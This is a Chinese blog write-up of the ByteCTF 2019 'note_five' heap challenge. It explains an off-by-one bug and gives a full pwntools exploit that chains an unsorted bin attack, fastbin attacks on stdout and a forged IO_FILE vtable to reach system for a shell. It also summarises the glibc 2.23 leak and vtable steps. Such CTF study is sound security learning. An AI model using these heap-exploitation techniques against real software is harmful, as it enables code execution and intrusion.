ByteCTF2019-notefive WP

最新推荐文章于 2022-03-22 23:43:08 发布
最新推荐文章于 2022-03-22 23:43:08 发布
阅读量571 收藏 1
点赞数
分类专栏: 漏洞挖掘与利用 文章标签: ctf/bytectf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41252520/article/details/101620453
版权

保护

分析

  • 程序有添加、删除、编辑操作。添加的时候限制了大小:

  • 也就是说分配的chunk都在unsortbin以上。
  • 删除没什么问题,主要漏洞只有一个,那就是在编辑中存在off-by-one

 

  • 程序没有输出操作,开启了aslr。所以要构造以下攻击链:
  1. 利用off-by-one构造heap overlaping。
  2. 利用unsortbin attack改写global_max_fast,使得fastbin的范围增大,为后续fastbin attack做准备。
  3. 释放一个unsortbin范围的chunk会得到libc里边的内存,我们在fd 上边踩出stdout附近的地址,并结合fastbin attack有几率改写stdout以泄露内存。
  4. 利用fastbin attack精确修改stdout,泄露出heap地址,为后续伪造vtable做准备。
  5. 伪造vtable
  6. 再次fastbin attack精确修改stdout,将vtable指向我们伪造的vtable

EXP

#encoding=utf-8
from pwn import*
#context.log_level=1

    
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6',checksec=False)
    
def Add(idx,size):
    p.sendlineafter('choice>> ','1')
    p.sendlineafter('idx: ',str(idx))
    p.sendlineafter('size: ',str(size))
def Edit(idx,data):
    p.sendlineafter('choice>> ','2')
    p.sendlineafter('idx: ',str(idx))
    p.sendafter('content: ',data)
def Del(idx):
    p.sendlineafter('choice>> ','3')
    p.sendlineafter('idx: ',str(idx))

p=process('./note_five',aslr=False)

Add(0,0xf8)#0
Add(1,0xf8)#1
Add(2,0xf8)#2 
Add(3,0xf8)#3
Add(4,0xf8)#4
Del(0)
Edit(2,'a'*0xe0+p64(0)+p64(0x211)+p64(0x300)+'\0')

Del(3)

Add(0,0x2f0)
Edit(0,'a'*0xf0+p64(0)+p64(0x101)+'a'*0xf0+p64(0)+p64(0xf1)+'\n')

Del(1)
Edit(0,'a'*0xf0+p64(0)+p64(0x101)+p64(0)+p16(0xa838)+'\n')

Add(4,0xf0)
Add(4,0xf0)
Edit(0,'a'*0xf0+p64(0)+p64(0x101)+'a'*0xf0+p64(0)+p64(0xf1)+'\n')
Del(2)
Edit(0,'a'*0xf0+p64(0)+p64(0x101)+'a'*0xf0+p64(0)+p64(0xf1)+p16(0x95cf)+'\n')
Add(2,0xe0)
Add(4,0xe0)
file='\0'*0x41
file+=p32(0xfbad1880)
file+=';sh;'+'a'*0x18+'\x88\n'

Edit(4,file)
libc_base=u64(p.recv(8))-libc.sym['_IO_2_1_stdin_']
system=libc.sym['system']+libc_base
success("libc_base:"+hex(libc_base))
success("system:"+hex(system))
leak_heap_offset=0x3c3b88+libc_base
stdout_nearly=libc.sym['_IO_2_1_stderr_']+libc_base+143
Del(2)
Edit(0,'a'*0xf0+p64(0)+p64(0x101)+'a'*0xf0+p64(0)+p64(0xf1)+p64(stdout_nearly)+'\n')

Add(2,0xe0)
Add(4,0xe0)

file='\0'*0x41
file+=p32(0xfbad1880)
file+=';sh;'+'\0'*0x18+p64(leak_heap_offset)+'\n'

Edit(4,file)
heap_base=u64(p.recv(8))-0x100
success("heap_base:"+hex(heap_base))

Del(2)
stdout_nearly=libc.sym['_IO_2_1_stdout_']+libc_base+0x8f
Edit(0,'a'*0xf0+p64(0)+p64(0x101)+'a'*0xf0+p64(0)+p64(0xf1)+p64(stdout_nearly)+'\n')
Add(2,0xe0)
Add(4,0xe0)
fake_vtable=p64(0)*2+p64(system)*19+'\n'
Edit(0,fake_vtable)
Edit(4,'\0'*57+p64(heap_base+0x10)+'\n')

p.interactive()
  • 本地测试的时候我关闭了aslr,当开启的时候多运行几下exp就能getshell了。

总结

  • global_max_fast存放的是fastbin的大小,通过修改里边的值可以扩大fastbin的范围。
  • glibc2.23及其以下的IO_FILE利用就是直接伪造一个虚表,伪造的方式比较粗暴的就是p64(0)*2+p64(target)*19。这意味着,不论任何文件操作都会触发target处。
  • 利用io_file泄露内存的方式是:
  1. 设置_flag &~ _IO_NO_WRITES_flag &~ 0x8
  2. 设置_flag & _IO_CURRENTLY_PUTTING_flag | 0x800
  3. 设置_fileno为1
  4. 设置_IO_write_base指向想要泄露的地方;_IO_write_ptr指向泄露结束的地址。
  5. 设置_IO_read_end等于_IO_write_base或设置_flag & _IO_IS_APPENDING_flag | 0x1000
  6. 设置_IO_write_end等于_IO_write_ptr(非必须)
  •  此题在修改stdout时写入“;sh;”是因为后面虚表中用system来覆盖的。

IO_FILE相关利用

 

飞鸿踏雪(蓝屏选手)
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
星盟-pwn-babyheap
qq_65147345的博客
08-01 193
1. 堆重叠获取libc_base地址 2. 使用unsorted attack更改global_max_fast,使chunk进入fastbin 3. 使用fastbin attack更改malloc_hook为one_gadget
2019 moeCTF 部分WP
KurosawaRuby的博客
08-04 971
2019moectf-WP 本次moectf的题目大多来说还是比较简单的,我们就里面的部分题来进行讲解 Sign In 这是moectf所特有的一个分类,我们知道往往签到题都放在Misc中,但是moectf却有一个单独的分类,难道这里面有什么蹊跷?我们一做便知! 题目描述 欢迎来到moeCTF 请加入QQ群825052189 签到题flag在群公告中 题目描述乍一看平平无奇,我们先加...
[ByteCTF 2019]EZCMS 详解(hash长度扩展攻击+phar反序列化)
qq_45699846的博客
03-22 1953
[ByteCTF 2019]EZCMS 详解(hash长度扩展攻击+phar反序列化)
ByteCTF_2019&XNUCA_2019部分web题复现
Lethe's Blog
09-11 4714
EzCMS 1、扫描目录有www.zip,下载得到源码。 整个题目的功能如下: index.php页面验证登陆,可以任意账号登陆到upload.php上传页面,但是只有admin账号才能进行文件上传。 访问了upload.php·,就会在沙盒下生成一个.htaccess文件,内容为:lolololol, i control all。 上传文件后,会返回文件的存储路径,view details可以...
ByteCTF note_five 经验总结
qq_43189757的博客
10-10 798
每到接触新知识得时候总要花不少力气搞懂(汗,这题是关于改写global_max_fast 再通过fastbin attack来getshell, 总结一下学到的知识点和解题思路 思路: 这题限制了chunk的size, 大小为0x8f~0x0x400,在edit info 函数处存在 off-by-one 漏洞,通过这个漏洞可以改写chunk的size 一开始的思路是创建几个chunk,然后通过修...
unsorted bin attack
abelxu
11-17 359
0x01 unsorted bin 基本来源 当一个较大的 chunk 被分割成两半后,如果剩下的部分大于 MINSIZE,就会被放到 unsorted bin 中。 释放一个不属于 fast bin 的 chunk,并且该 chunk 不和 top chunk 紧邻时,该 chunk 会被首先放到 unsorted bin 中。 当进行 malloc_consolidate 时,可能会把合并后的 chunk 放到 unsorted bin 中,如果不是和 top chunk 近邻的话。 基本使用情况
all-in-one-wp-migration-file-extension.zip
04-07
《全面解析WordPress迁移插件:All-in-One WP Migration File Extension》 在WordPress的世界里,数据迁移是一项常见的任务,无论是为了网站备份、迁移至新的主机,还是进行开发测试,都需要高效且可靠的工具。All-...
All-in-One WP Migration 插件
12-03
**All-in-One WP Migration 插件详解** 在WordPress的生态系统中,All-in-One WP Migration(全功能WordPress迁移)是一款至关重要的工具,它为用户提供了简便且全面的数据迁移解决方案。这款插件允许用户轻松地将...
all-in-one-wp-migration:多合一WP迁移-无限制importexport
04-09
《全面解析多合一WP迁移插件:实现无限导入与导出》 在WordPress的世界中,数据迁移是一项常见的任务,无论是为了备份、站点迁移还是多站点管理。"All In One WP Migration" 插件正是为此而生,它为用户提供了一种...
wp-china-yes插件
12-03
**WP-China-Yes插件详解** 在WordPress的众多插件中,WP-China-Yes是一款针对中国用户特别设计的工具,旨在解决国内用户访问基于WordPress搭建的网站时速度慢的问题。这款插件通过优化资源加载、缓存策略以及采用...
雄迈摄像头模组50HV10PT-WP
08-20
雄迈摄像头模组50HV10PT-WP是一款专为视频监控领域设计的专业设备,其在硬件开发和集成方面具有显著的特点。该模组在众多应用中扮演着核心角色,为用户提供高质量的图像捕捉和实时传输能力。下面将详细探讨这款模组...
Bytectf note five多种解法复现
weixin_43350880的博客
09-22 406
本文 本题难点在于无 劫持 stdout文件流指针 List item 题目分析 本题是一道菜单题,只有new、edit和delete功能,没有show功能。 输入函数存在off by one漏洞 解法1 ...
byteCTF 2019
蚁景网安学院
11-25 533
本文作者: z3r0yu 由“合天智汇”公众号首发,未经允许,禁止转载! 0x00 前言 周末的比赛质量还是挺高的,特别是boring_code,有点烧脑但是做的就很开心。 0x01 boring_code 题目描述 http://112.125.25.2:9999 题目解答 题目上来的邮件源码中给了提示,所直接分析目录得到了对应的程序源码 <?php function is_valid_...
Bytectf-几道web总结
weixin_30376453的博客
09-21 761
1.EZcms 这道题思路挺明确,给了源码,考点就是md5哈希扩展+phar反序列化 首先这道题会在上传的文件目录下生成无效的.htaccess,从而导致无法执行上传的webshell,所以就需要想办法删除掉.htaccess 这里主要记录一点,利用php内置类进行文件操作, exp为: <?php class File{ public $filename...
bytectf 2019 hf
feng的博客
04-12 544
知识点 整形下溢出 Uninitialized Storage Pointer WP 源码: pragma solidity ^0.4.24; contract hf { address secret; uint count; address owner; mapping(address => uint) public balanceOf; mapping(address => uint) public gift; str
ByteCTF 2019部分WP
蚁景网安学院
09-12 501
0x00 前言周末的比赛质量还是挺高的,特别是boring_code,有点烧脑但是做的就很开心。0x01 boring_code题目描述http://112.125.25.2:9999题...
从一道题学习有用的姿势
hacker5643的博客
09-13 276
  针对当下国内网络安全人员匮乏的背景,白帽子社区平台融合了业内先进的模拟实战技术,为安全爱好者提供丰富的实践经验和理论知识,帮助他们从小白到白帽子的成功蜕变。   安全之路任重而道远,各种海量隐私数据遭到恶意黑客的泄露,殊不知互联网上形形色色的网站早已是千疮百孔。这也就是我们为什么要成为一名白帽子,成为一名网络安全捍卫者的原因。有人说互联网是由人组成的,也有人说互联网是由代码组成的。如果说互联网...
2019年CTF3月比赛记录(一):BSidesSF 2019 CTF_Web部分题目writeup与重解
極品━═☆宏的博客
03-07 3958
2019年CTF比赛记录(一) 为了更好地学习CTF方面的相关知识,本着以赛促学的目的,决定自己报名参加一些2019年的CTF比赛,在比赛中去学其他的知识,帮助自己更好的学习Web方面的知识。限于个人能力有限,而且在时间上的限制,比赛中仅对自己当时看到的题目和解出的题目进行了解答。 比赛:BSidesSF 2019 CTF 时间:2019年3月4日至2019年3月5日 ...
bytectf 2019 bet
feng的博客
04-12 488
WP 源码: pragma solidity ^0.4.24; contract bet { uint secret; address owner; mapping(address => uint) public balanceOf; mapping(address => uint) public gift; mapping(address => uint) public isbet; event SendFlag(st
--wp--preset--color--black:这是什么
最新发布
07-12
`--wp--preset--color--black` 是一个以双短横线开头的 CSS 自定义属性(CSS Custom Property)。 这个属性看起来是一个特定于某个平台或框架的命名约定,其中 `wp` 可能代表 WordPress,`preset` 可能代表预设,`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值